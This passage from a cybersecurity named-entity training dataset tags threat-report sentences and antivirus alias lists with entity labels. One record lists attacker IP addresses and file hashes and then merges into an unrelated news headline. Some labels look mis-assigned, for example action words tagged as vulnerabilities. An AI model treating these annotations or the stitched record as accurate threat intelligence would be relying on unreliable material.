"cyner2_train_001229", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Revetrat Trojan:MSIL/Starter.I Trj/GdSda.A Win32/Trojan.db5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001230", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Z.Pemalform.45056.A W32.W.Otwycal.l4av TrojanDownloader:Win32/Raemnk.A Win32/RiskWare.PEMalform.E Win32/Trojan.444", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001231", "source": "cyner2_train"}} {"text": "The targets were then further narrowed to those that were running the Mac OS X operating system, had not previously visited the website, and had specific browser versions.", "spans": {"SYSTEM: the Mac OS X operating system,": [[66, 96]], "SYSTEM: browser versions.": [[154, 171]]}, "info": {"id": "cyner2_train_001233", "source": "cyner2_train"}} {"text": "Ginp embeds the following set of features , allowing it to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( local overlays obtained from the C2 ) SMS harvesting : SMS listing SMS harvesting : SMS forwarding Contact list collection Application listing Overlaying : Targets list update SMS : Sending Calls : Call forwarding C2 Resilience : Auxiliary C2 list Self-protection : Hiding the App icon Self-protection : Preventing removal Self-protection : Emulation-detection Update 10/03/2020 At the end of February the actors behind Ginp added screen capture capabilities to their Trojan .", "spans": {"MALWARE: Ginp": [[0, 4], [560, 564]]}, "info": {"id": "cyner2_train_001237", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanPWS.Grozlex.A3 Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_GROZLEX.SMA Win.Spyware.Grozlex-1 TSPY_GROZLEX.SMA PWS:MSIL/Mintluks.A Trojan.PasswordStealer.MSIL", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001238", "source": "cyner2_train"}} 
{"text": "A backdoor also known as: W32.ArtemisPuty.Trojan Trojan.Modputty.A5 Trojan.Puty.Win32.1 Trojan/MalPutty.a W32/Trojan.SHOY-1500 Win.Trojan.Stealzilla-1 Trojan-PSW.Win32.Puty.a Trojan.Win32.Puty.dsnaim Troj.PSW32.W.Puty.tnaX Win32.Trojan-qqpass.Qqrob.Llhf BackDoor.DaVinci.18 BehavesLike.Win32.BadFile.hh Trojan.Win32.Modputty Trojan/PSW.Puty.a Trojan:Win32/Modputty.A Trojan-PSW.Win32.Puty.a Trojan/Win32.Modputty.C862836 TrojanPSW.Puty Trojan.PWS.Puty! W32/MalPutty.A!tr Trj/Fakeputty.A Win32/Trojan.Spy.b9b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001240", "source": "cyner2_train"}} {"text": "We have analyzed the samples to determine the author's ultimate goal and have named this malware KeyRaider", "spans": {"THREAT_ACTOR: author's": [[46, 54]], "MALWARE: malware KeyRaider": [[89, 106]]}, "info": {"id": "cyner2_train_001242", "source": "cyner2_train"}} {"text": "A backdoor also known as: VBS/Downldr.HM VBS.Downloader.B VBS_LOCKY.DLDSARF Win.Trojan.Locky-6360731-0 Trojan.Script.ExpKit.etmlqw Troj.Downloader.Script!c VBS.DownLoader.1006 VBS_LOCKY.DLDSARF VBS/Downldr.HM Trojan/VBS.downloder TrojanDownloader:VBS/Locky.A VBS/Obfus.S8 Trojan-Ransom.Script.Locky virus.vbs.qexvmc.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001243", "source": "cyner2_train"}} {"text": "It uses insidious injection and other sophisticated and stealthy methods.", "spans": {}, "info": {"id": "cyner2_train_001245", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Sasser.D Win32.Trojan.WisdomEyes.16070401.9500.9679 W32.Sasser.D Win32/Sasser.D Win.Worm.Sasser-2 Net-Worm.Win32.Sasser.c Trojan.Win32.Sasser.fvek Worm.Win32.Sasser.16384 W32.W.Sasser.kZ72 W32/Sasser.worm.d I-Worm/Sasser.d WORM/Sasser.D Worm[Net]/Win32.Sasser Net-Worm.Win32.Sasser.c Worm:Win32/Sasser.dam W32/Sasser.worm.d Worm.Sasser W32/Sasser.D.worm Email-Worm.Win32.Plexus W32/Sasser.C!worm.im", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_train_001246", "source": "cyner2_train"}} {"text": "Full remote access capabilities is a dream tool for the black hat community, and are highly sought after.", "spans": {"MALWARE: remote access": [[5, 18]], "MALWARE: tool": [[43, 47]], "THREAT_ACTOR: black hat community,": [[56, 76]]}, "info": {"id": "cyner2_train_001247", "source": "cyner2_train"}} {"text": "The purpose of using such a design is likely to make understanding and analyzing the malware's code flow more difficult for researchers.", "spans": {"ORGANIZATION: researchers.": [[124, 136]]}, "info": {"id": "cyner2_train_001248", "source": "cyner2_train"}} {"text": "Recently, I've been investigating malware utilizing PowerShell and have spent a considerable amount of time refining ways to identify new variants of attacks as they appear.", "spans": {"MALWARE: malware": [[34, 41]], "SYSTEM: PowerShell": [[52, 62]], "MALWARE: variants": [[138, 146]]}, "info": {"id": "cyner2_train_001250", "source": "cyner2_train"}} {"text": "As proof of its popularity, certain government officials are said to employ this application for communication purposes in the office.", "spans": {}, "info": {"id": "cyner2_train_001252", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Turla.ar Trojan.Asprox.B Trojan.MulDrop7.18901 BehavesLike.Win32.Downloader.dc Trojan:Win32/Regin.D!dha Trj/Chgt.J Win32/Turla.AR Trojan.Turla!gdUjdZ2fM5A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001253", "source": "cyner2_train"}} {"text": "Now, three months after the source code was published, we decided to have a look at what has changed in the banking malware landscape.", "spans": {"MALWARE: the banking malware": [[104, 123]]}, "info": {"id": "cyner2_train_001254", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Crypt.RI Trojan.Crypt.RI Trojan.Crypt.RI Trojan.Crypt.RI Trojan.Crypt.RI Trojan.Crypt.RI Trojan.Crypt Trojan.Crypt.RI", "spans": {"MALWARE: backdoor": [[2, 
10]]}, "info": {"id": "cyner2_train_001255", "source": "cyner2_train"}} {"text": "Sysget malware was delivered both directly via phishing emails, as well as in Rich Text Format RTF documents exploiting the CVE-2015-1641 vulnerability patched in MS15-033 that in turn leveraged a very unique shellcode.", "spans": {"MALWARE: Sysget malware": [[0, 14]], "VULNERABILITY: exploiting": [[109, 119]], "VULNERABILITY: vulnerability": [[138, 151]]}, "info": {"id": "cyner2_train_001258", "source": "cyner2_train"}} {"text": "Indicators about Sakula and multiple RATs that are being used across multiple intrusions.", "spans": {"MALWARE: Sakula": [[17, 23]], "MALWARE: multiple RATs": [[28, 41]]}, "info": {"id": "cyner2_train_001260", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Tofsee.B Trojan-Proxy.Win32.Xorpix.m Trojan.Win32.Xorpix.zybt Trojan.Win32.Proxy.12800.C Trojan.DownLoader.19108 Trojan.Small.Win32.39831 TrojanProxy.Xorpix.k Troj.Proxy.W32!c Trojan-Proxy.Win32.Xorpix.m Trojan/Win32.Xorpix.R72000 Win32/Small.NCN Win32.Trojan-proxy.Xorpix.Amci Trojan.Win32.Small Bck/Xorpix.AG Win32/Trojan.Proxy.211", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001261", "source": "cyner2_train"}} {"text": "Mobile monetization platforms create software libraries that authors can embed into their apps to start earning money quickly.", "spans": {"ORGANIZATION: Mobile monetization platforms": [[0, 29]], "SYSTEM: software libraries": [[37, 55]], "THREAT_ACTOR: authors": [[61, 68]], "SYSTEM: apps": [[90, 94]]}, "info": {"id": "cyner2_train_001262", "source": "cyner2_train"}} {"text": "It required other means to be deployed on targeted organizations' networks and is configured with previously stolen credentials.", "spans": {}, "info": {"id": "cyner2_train_001264", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Heur.Corrupt.PE TrojanDownloader:Win32/WarezSet.dam#2", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001267", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.KloggerQKA.Trojan Trojan-Downloader.Win32.Delf!O Backdoor.Gobot Downloader.Delf.Win32.70 Backdoor.W32.Gobot.lfDt Trojan/Downloader.Delf.bm Win32.Trojan.WisdomEyes.16070401.9500.9965 W32/Avokado.SIKN-9031 W32.Gobot.A Backdoor.Gobot Win32/Gobot.B WORM_GOBOT.G Win.Downloader.Delf-144 Trojan.Win32.Delf.gvzc Trojan.Win32.Delf.47087 Win32.HLLW.Ghostbot WORM_GOBOT.G BehavesLike.Win32.Kudj.pc Backdoor.Win32.Gobot W32/Avokado.B@bd TrojanDownloader.Delf.pgr TR/Dldr.Delf.BM Trojan[Backdoor]/Win32.Gobot Backdoor:Win32/Gobot.A Worm/Win32.IRCBot.R29095 Bck/Gotob.AA Trojan.Delf.BM Win32/TrojanDownloader.Delf.BM Trojan.DL.Delf!UOW7nlBxiow", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001268", "source": "cyner2_train"}} {"text": "In recent weeks, Unit 42 has discovered three documents crafted to exploit the InPage program.", "spans": {"ORGANIZATION: Unit 42": [[17, 24]], "MALWARE: exploit": [[67, 74]], "SYSTEM: InPage program.": [[79, 94]]}, "info": {"id": "cyner2_train_001271", "source": "cyner2_train"}} {"text": "The malware families identified at this time are DarkComet, LuminosityLink RAT, Pony, ImmenentMonitor, and some multiple variations of shellcode.", "spans": {"MALWARE: The malware families": [[0, 20]], "MALWARE: DarkComet, LuminosityLink RAT, Pony, ImmenentMonitor,": [[49, 102]], "MALWARE: variations of shellcode.": [[121, 145]]}, "info": {"id": "cyner2_train_001272", "source": "cyner2_train"}} {"text": "Despite the 2016 Olympics coming to a close, cybercriminals remain relentless in using the sporting event as a social engineering hook to distribute a banking Trojan.", "spans": {"ORGANIZATION: Olympics": [[17, 25]], "THREAT_ACTOR: cybercriminals": [[45, 59]], "MALWARE: banking Trojan.": [[151, 166]]}, "info": {"id": "cyner2_train_001274", "source": "cyner2_train"}} {"text": "A backdoor also known 
as: Program.Optimizer.12 TrojanDownloader:Win32/Javsisxep.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001275", "source": "cyner2_train"}} {"text": "Of note, this is three years earlier than the oldest Elise sample we have found, suggesting this group has been active longer than previously documented.", "spans": {"MALWARE: Elise": [[53, 58]], "THREAT_ACTOR: group": [[97, 102]]}, "info": {"id": "cyner2_train_001280", "source": "cyner2_train"}} {"text": "A backdoor also known as: TSPY_KILLAV_BK2200FA.TOMC Trojan.Win32.NtRootKit.dgaent Troj.GameThief.W32.OnLineGames.l7iy Trojan.DownLoad3.35430 Trojan.KillAV.Win32.9854 TSPY_KILLAV_BK2200FA.TOMC TR/Killav.OI.2 Trojan/Win32.Unknown Trojan.Graftor.D3B65 Trojan:WinNT/Killav.E Trojan/Win32.KillAV.R32978 Trojan.Win32.KillAV.aal W32/KillAV.NKC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001281", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrjnDwnldr.Banload.FC.2467 Win32.Trojan.WisdomEyes.16070401.9500.9993 W32/Trojan.FOJF-1615 Ransom_Blocker.R004C0DAM18 Win.Trojan.12504345-1 Trojan-Ransom.Win32.Blocker.kqil Troj.Ransom.W32.Blocker!c Trojan.DownLoader13.59179 Ransom_Blocker.R004C0DAM18 Trojan/Blocker.kir TR/Spy.Banker.37888.6 Trojan[Ransom]/Win32.Blocker Trojan.Kazy.D81FF3 Trojan-Ransom.Win32.Blocker.kqil TrojanSpy:MSIL/Banker.M Trojan/Win32.MDA.C931868 Hoax.Blocker Trojan.Banker.WHS Win32.Trojan.Blocker.Pgmu Trojan.Blocker!RxWDop6Ua70 Trojan.MSIL.PSW Win32/Trojan.Spy.d2d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001283", "source": "cyner2_train"}} {"text": "Through this entry, in which we take a closer look at an individual who we believe might be connected to the Winnti group, we hope to give both ordinary users and organizations better insights into some of the tools – notably the server infrastructures- these kinds of threat actors use, as well as the scale in which they operate.", "spans": 
{"ORGANIZATION: individual": [[57, 67]], "THREAT_ACTOR: the Winnti group,": [[105, 122]], "ORGANIZATION: ordinary users": [[144, 158]], "ORGANIZATION: organizations": [[163, 176]], "MALWARE: tools": [[210, 215]], "SYSTEM: the server infrastructures-": [[226, 253]], "THREAT_ACTOR: threat actors": [[269, 282]]}, "info": {"id": "cyner2_train_001285", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Dinwod!O W32.Virut.Cur1 W32.Virut.CF Win32/Virut.17408!corrupt WORM_OTORUN.SMN1 Trojan-Dropper.Win32.Dinwod.by Trojan.Win32.Dinwod.cooobe Troj.Dropper.W32.Dinwod.mmkC Virus.Win32.Virut.ua Virus.Win32.Virut.CE Trojan.MulDrop3.51046 WORM_OTORUN.SMN1 Win32/Virut.bv TR/VB.Inject.qopannv Trojan[Dropper]/Win32.Dinwod Win32.Virut.cr.61440 Trojan.Zusy.D423D8 Dropper.Dinwod.151552 Trojan-Dropper.Win32.Dinwod.by Worm:Win32/Rortoti.A HEUR/Fakon.mwf TScope.Trojan.VB Trojan.FileLock I-Worm.Filecoder.A Win32/Virut.NBP Trojan-Dropper.Win32.Dinwod W32/Sality.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001288", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ursu.D1347A Win32.Trojan.WisdomEyes.16070401.9500.9990 Trojan.MulDrop7.48244 Trojan-Ransom.Rantest W32.Ransomsimulation TR/StartPage.wgude Trojan/MSIL.Miner RiskWare.RansomSimulator Trj/GdSda.A Trojan.StartPage!pRfC+LclTxM Win32/Trojan.7c5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001289", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.WebSearch W32/Application.KWFL-8070 Trojan.Win32.WebSearch.ak Trojan.Win32.WebSearch.ommdf Trojan.Win32.Z.Websearch.263168 Troj.W32.Websearch!c TR/WebSearch.V Trojan:Win32/WebSearch.F Trojan.Win32.WebSearch.ak Trj/CI.A Win32.Trojan.Websearch.Lmap Trojan.WebSearch!GWyPJuQViZY Win32/Trojan.3ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001290", "source": "cyner2_train"}} {"text": "Locky is a ransomware that can be installed when you 
open an attachment, usually as a Word file from a spam email.", "spans": {"MALWARE: Locky": [[0, 5]], "MALWARE: ransomware": [[11, 21]]}, "info": {"id": "cyner2_train_001291", "source": "cyner2_train"}} {"text": "We are seeing a bit of an uptick of emails containing java adwind or Java Jacksbot attachments.", "spans": {"MALWARE: adwind": [[59, 65]], "MALWARE: Jacksbot": [[74, 82]]}, "info": {"id": "cyner2_train_001292", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/Dropper.ANAB TROJ_DROPPER.SMW Packed.Win32.Krap.ap Trojan.Winlock.587 TROJ_DROPPER.SMW BehavesLike.Win32.FakeAlertSecurityTool.fc W32/Risk.VFHY-0574 Trojan[Packed]/Win32.Krap Packed.Win32.Krap.ap Dropper/Win32.Smiscer.R13962 Trojan.DR.Procesemes!WkidsgpO+Do Packed.Win32.Krap", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001294", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.BitCoinMiner.jz Trojan.Win32.BitCoinMiner.euxcee Win32.Trojan.Bitcoinminer.Wrgk Trojan.DownLoader25.54215 Trojan.CoinMiner.Win32.6503 Trojan/Win32.BitCoinMiner Trojan.Win32.BitCoinMiner.jz TrojanDownloader:MSIL/CoinMiner.A!bit Trojan.BitCoinMiner Trojan.BitCoinMiner Trj/GdSda.A Trojan.BitCoinMiner!x6PcA/gbW/U W32/BitCoinMiner.JZ!tr Win32/Trojan.5d5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001295", "source": "cyner2_train"}} {"text": "A few weeks ago, we observed new activity from ChessMaster, with notable evolutions in terms of new tools and tactics that weren't present in the initial attacks.", "spans": {"MALWARE: ChessMaster,": [[47, 59]], "MALWARE: tools": [[100, 105]]}, "info": {"id": "cyner2_train_001296", "source": "cyner2_train"}} {"text": "It abuses the legitimate and popular open source framework DroidPlugin which allows an app to dynamically launch any apps as plugins without installing them in the system.", "spans": {"VULNERABILITY: abuses": [[3, 9]], "VULNERABILITY: open 
source framework DroidPlugin": [[37, 70]], "VULNERABILITY: allows an app to dynamically launch any apps as plugins": [[77, 132]], "SYSTEM: system.": [[164, 171]]}, "info": {"id": "cyner2_train_001297", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.StartPage.e.Trojan Trojan.Startpage TROJ_STARTPAGE_FD050152.UVPM Trojan.Win32.Z.Startpage.4001399 TROJ_STARTPAGE_FD050152.UVPM TR/StartPage.sdjtv W32/STARTPAGE_FD050152.UVPM!tr Win32/Trojan.41b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001298", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan.VB Trojan/VB.bmd Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.ZJNQ-3376 TROJ_VB.FVH Win.Trojan.VB-3241 Trojan.Win32.VB.bmd Trojan.Win32.VB.crkyqv Troj.W32.Vb!c Trojan.Win32.VB.aae Trojan.SimSun Trojan.VB.Win32.1599 TROJ_VB.FVH BehavesLike.Win32.PJTbinder.qz Trojan.Win32.Elkmil W32/Trojan2.YLV W32/VB.QRB!tr Trojan/Win32.VB Win32.Troj.VB.kcloud Trojan.Heur.E1F0CA Trojan.Win32.VB.28672.K Trojan.Win32.VB.bmd Trojan/Win32.Xema.R125410 TScope.Trojan.VB Trj/QQPass.AWP Virus.Win32.HideDoc.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001302", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.PPdoor.159232 Backdoor.Win32.PPdoor!O Win32.Trojan.WisdomEyes.16070401.9500.9989 Backdoor.Trojan BKDR_PPDOOR.AL Win.Trojan.PPDoor-3 Backdoor.Win32.PPdoor.bo Trojan.Win32.PPdoor.qstx Backdoor.Win32.PPdoor.A BackDoor.Srvlite BKDR_PPDOOR.AL BehavesLike.Win32.Pykse.ch W32/PPdoor.GR Backdoor/PPdoor.bo DR/Pere.103936.E.2 Trojan[Backdoor]/Win32.PPdoor Backdoor:Win32/Ppdoor.AJ Backdoor.Win32.PPdoor.bo Trojan/Win32.Ppdoor.C139757 Virus.Win32.Bayan-based Backdoor.PPdoor!lYc+pVWanGQ Backdoor.Win32.PPdoor Trj/PPDoor.FD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001304", "source": "cyner2_train"}} {"text": "Check Point Mobile Threat Prevention has detected a new, unknown 
mobile malware that targeted two customer Android devices belonging to employees at a large financial services institution.", "spans": {"ORGANIZATION: Check Point Mobile Threat Prevention": [[0, 36]], "MALWARE: unknown": [[57, 64]], "SYSTEM: Android devices": [[107, 122]], "ORGANIZATION: employees": [[136, 145]], "ORGANIZATION: large financial services institution.": [[151, 188]]}, "info": {"id": "cyner2_train_001305", "source": "cyner2_train"}} {"text": "FireEye recommends that Microsoft Office users apply the patch from Microsoft.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "SYSTEM: Microsoft Office": [[24, 40]], "ORGANIZATION: Microsoft.": [[68, 78]]}, "info": {"id": "cyner2_train_001307", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hacktool.Flystudio.16558 TSPY_AKSULA_CA083865.TOMC Win32.Trojan-PSW.Alipay.a TSPY_AKSULA_CA083865.TOMC Trojan-PSW.Win32.Alipay.peq Troj.Downloader.W32.BaiDload.lhQG TR/Aksula.jqeqy Trojan:Win32/Aksula.A Trojan.Mikey.D906C Trojan-PSW.Win32.Alipay.peq Trojan/Win32.Aksula.R27086 Win32.Trojan-qqpass.Qqrob.Phqe", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001309", "source": "cyner2_train"}} {"text": "IOCs C & C IP addresses : 155.133.82.181 155.133.82.240 155.133.82.244 185.234.218.59 195.22.126.160 195.22.126.163 195.22.126.80 195.22.126.81 5.45.73.24 5.45.74.130 IP addresses from which the Trojan was downloaded : 185.174.173.31 185.234.218.59 188.166.156.110 195.22.126.160 195.22.126.80 195.22.126.81 195.22.126.82 195.22.126.83 SHA256 : 158c7688877853ffedb572ccaa8aa9eff47fa379338151f486e46d8983ce1b67 3aedbe7057130cf359b9b57fa533c2b85bab9612c34697585497734530e7457d f3ae6762df3f2c56b3fe598a9e3ff96ddf878c553be95bacbd192bd14debd637 df61a75b7cfa128d4912e5cb648cfc504a8e7b25f6c83ed19194905fef8624c8 c0cfd462ab21f6798e962515ac0c15a92036edd3e2e63639263bf2fd2a10c184 d791e0ce494104e2ae0092bb4adc398ce740fef28fa2280840ae7f61d4734514 38dcec47e2f4471b032a8872ca695044ddf0c61b9e8d37274147158f689d65b9 
27cea60e23b0f62b4b131da29fdda916bc4539c34bb142fb6d3f8bb82380fe4c 31edacd064debdae892ab0bc788091c58a03808997e11b6c46a6a5de493ed25d 87ffec0fe0e7a83e6433694d7f24cfde2f70fc45800aa2acb8e816ceba428951 eabc604fe6b5943187c12b8635755c303c450f718cc0c8e561df22a27264f101 Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Maker May 12 , 2016 Mohit Kumar How to Hack an Android device ? It is possibly one of the most frequently asked questions on the Internet .", "spans": {"SYSTEM: ARM": [[1120, 1123]], "SYSTEM: Android": [[1171, 1178]]}, "info": {"id": "cyner2_train_001310", "source": "cyner2_train"}} {"text": "All born in the 90s, these neophytes are not afraid to get caught, carelessly leaving a trail of traceable contact details online.", "spans": {"THREAT_ACTOR: neophytes": [[27, 36]]}, "info": {"id": "cyner2_train_001311", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DefayliLTO.Trojan Trojan.Win32.Cosmu!O Trojan.Hosts Trojan.Cosmu.Win32.8116 Win32.Trojan.Qhost.y W32/Trojan2.OIIF Trojan.Qhosts TROJ_COSMU_000001b.TOMA Win.Trojan.Cosmu-1352 Trojan.Win32.Hosts2.wog Trojan.Win32.Drop.rqzxb Troj.W32.Hosts2.toz0 Virus.Win32.Virut.ua TrojWare.Win32.Qhost.rqj Trojan.MulDrop3.7647 TROJ_COSMU_000001b.TOMA BehavesLike.Win32.PUPXAN.tz W32/Trojan.VWTG-6346 Win32/Virut.bv TR/Cosmu.oiqea Trojan/Win32.Cosmu Worm:Win32/Makc.A Trojan.Graftor.D2333 Trojan.Win32.A.Cosmu.577633 Trojan.Win32.Hosts2.wog HEUR/Fakon.mwf BScope.Trojan.IRCbot Win32/Qhost.ONX Trojan.Cosmu!mnslE6bxKwc Worm.Win32.AutoIt W32/Qhost.ONX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001313", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Gezak Trojan.Vir.HLL Trojan.Heur.ED5CCE WORM_GEZAK.A W32/Risk.GNIP-0600 W32.Osapex Win32/Gezak.A WORM_GEZAK.A Win.Trojan.Gezak-1 Virus.Win32.HLLW.Gezak Virus.Win32.HLLW.gjmh W32.HLLW.Gezak!c Win32.HLLW.Gezak Win32.HLLW.Osapex Virus.Gezak.Win32.1 W32/Osapex.b.worm Win32/HLLW.Gezak Virus/Win32.Gezak 
Win32.HLLW.kcloud Virus.Win32.HLLW.Gezak Win32/Osapex.worm.31744 W32/Osapex.b.worm Trojan.Worm Univ.AP.K Win32/HLLW.Gezak Win32.Virus.Hllw.Hnbi Win32.HLLW.Gezak Virus.Win32.HLLW W32/Gezak.A!worm Win32/Worm.fc8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001315", "source": "cyner2_train"}} {"text": "Some examples are email messages claiming to be in regards to an overdue bill or invoice, utilizing such terminology in the subject line and given file name, such as invoice.zip or payment_doc_298427.zip", "spans": {}, "info": {"id": "cyner2_train_001316", "source": "cyner2_train"}} {"text": "We haven't seen Locky for a long time, so I was quite surprised to see this one.", "spans": {}, "info": {"id": "cyner2_train_001319", "source": "cyner2_train"}} {"text": "WHO IS BEHIND FAKESPY ’ S SMISHING CAMPAIGNS ? The Cybereason Nocturnus team suspects that the malware operators and authors are Chinese speakers .", "spans": {"MALWARE: FAKESPY": [[14, 21]], "ORGANIZATION: Cybereason Nocturnus": [[51, 71]]}, "info": {"id": "cyner2_train_001321", "source": "cyner2_train"}} {"text": "It was hosting an Adobe Flash exploit targeting one of the newly disclosed vulnerabilities from the Hacking Team data breach, CVE-2015-5122.", "spans": {"SYSTEM: Adobe Flash": [[18, 29]], "MALWARE: exploit": [[30, 37]], "VULNERABILITY: vulnerabilities": [[75, 90]], "ORGANIZATION: Hacking Team": [[100, 112]]}, "info": {"id": "cyner2_train_001322", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Small.14848.GD Trojan.Win32.Small!O Trojan/Small.cnp Trojan.Conjar.8 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Ransomlock TROJ_IKYTOK.SMI Trojan.Win32.Small.djdxj TROJ_IKYTOK.SMI Trojan/Small.kgz TR/Zapchast.I Trojan:Win32/Ikytoky.A Trojan.Win32.A.Small.14848 Trojan/Win32.Menti.R9065 Trojan.Karagany Trojan.Downloader.MB Trj/Hexas.HEU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001324", "source": "cyner2_train"}} {"text": 
"A backdoor also known as: Trojan/Injector.dtxv TROJ_INJECTOR_HA010038.UVPM Win32.Trojan-PSW.Fareit.a W32/Injector.GBX TROJ_INJECTOR_HA010038.UVPM Win.Trojan.Fareit-403 Riskware.Win32.Stealer.evlqpt Trojan.PWS.Stealer.18592 Trojan.Ekstak.Win32.3539 W32/Injector.ELVO-4299 DR/Delphi.rghyi Trojan/Win32.Ekstak.R214290 Backdoor.Androm Trojan.Injector Win32/PSW.Fareit.A Trojan.Win32.Injector W32/Kryptik.GCFM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001325", "source": "cyner2_train"}} {"text": "Many domains in this report are compromised domains - traffic to them may not be malicious.", "spans": {}, "info": {"id": "cyner2_train_001327", "source": "cyner2_train"}} {"text": "Analysis of TG-3390's operations, targeting, and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China.", "spans": {"THREAT_ACTOR: TG-3390's operations,": [[12, 33]], "MALWARE: tools": [[49, 54]], "ORGANIZATION: CTU": [[59, 62]]}, "info": {"id": "cyner2_train_001331", "source": "cyner2_train"}} {"text": "In January 2016 Forcepoint Security Labs reported an email campaign delivering the Ursnif banking Trojan which used the Range' feature within its initial HTTP requests to avoid detection.", "spans": {"ORGANIZATION: Forcepoint Security Labs": [[16, 40]], "THREAT_ACTOR: email campaign": [[53, 67]], "MALWARE: Ursnif banking Trojan": [[83, 104]]}, "info": {"id": "cyner2_train_001332", "source": "cyner2_train"}} {"text": "The Lazarus group, which has been identified as the backbone of the report, has been active in the past, and Novetta's research is helping to preemptively counteract and prevent Lazarus attacks around the world.", "spans": {"THREAT_ACTOR: The Lazarus group,": [[0, 18]], "ORGANIZATION: Novetta's research": [[109, 127]], "THREAT_ACTOR: Lazarus": [[178, 185]]}, "info": {"id": "cyner2_train_001333", "source": "cyner2_train"}} {"text": "While vertical targeting varies, we observed a significant 
focus on Financial Services.", "spans": {"ORGANIZATION: Financial Services.": [[68, 87]]}, "info": {"id": "cyner2_train_001334", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.LRSgzengelSvrA.Trojan Trojan/W32.Rootkit.78592 Trojan.Festi.C6 Trojan/Tent.cow Trojan.Rootkit.1 RTKT_FESTI.SM Win32.Trojan.WisdomEyes.16070401.9500.9989 Trojan.Festi RTKT_FESTI.SM Win.Trojan.Rootkit-4345 Trojan.Win32.Tent.ddfje Trojan.NtRootKit.12267 Rootkit.Tent.Win32.134 Rootkit.Tent.fc RKIT/Tent.aui Trojan[Rootkit]/Win32.Tent Backdoor:WinNT/Festi.C Win-Trojan/Festi.78592 TScope.Malware-Cryptor.SB Trj/CI.A Win32.Exploit.Tent.cmvx", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001336", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.downCN.Adware Trojan-Downloader.Win32.Petus!O Win32.Trojan.WisdomEyes.16070401.9500.9998 TROJ_DLDR.SMIH Trojan.Win32.Petus.efjtuk Trojan.Win32.A.Downloader.69153 Troj.Dropper.W32.StartPage.lmCy Trojan.DownLoader4.54937 Downloader.Petus.Win32.9 TROJ_DLDR.SMIH Trojan-Downloader.Win32.Petus Trojan[Downloader]/Win32.Petus TrojanDownloader:Win32/Petus.C Trojan/Win32.Petus.R4023 Win32/Trojan.c81", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001338", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.Cosmu.PE Win32.Worm.VB.NZQ Trojan.Win32.Cosmu!O W32.Lamer.EL3 Trojan.Downloader 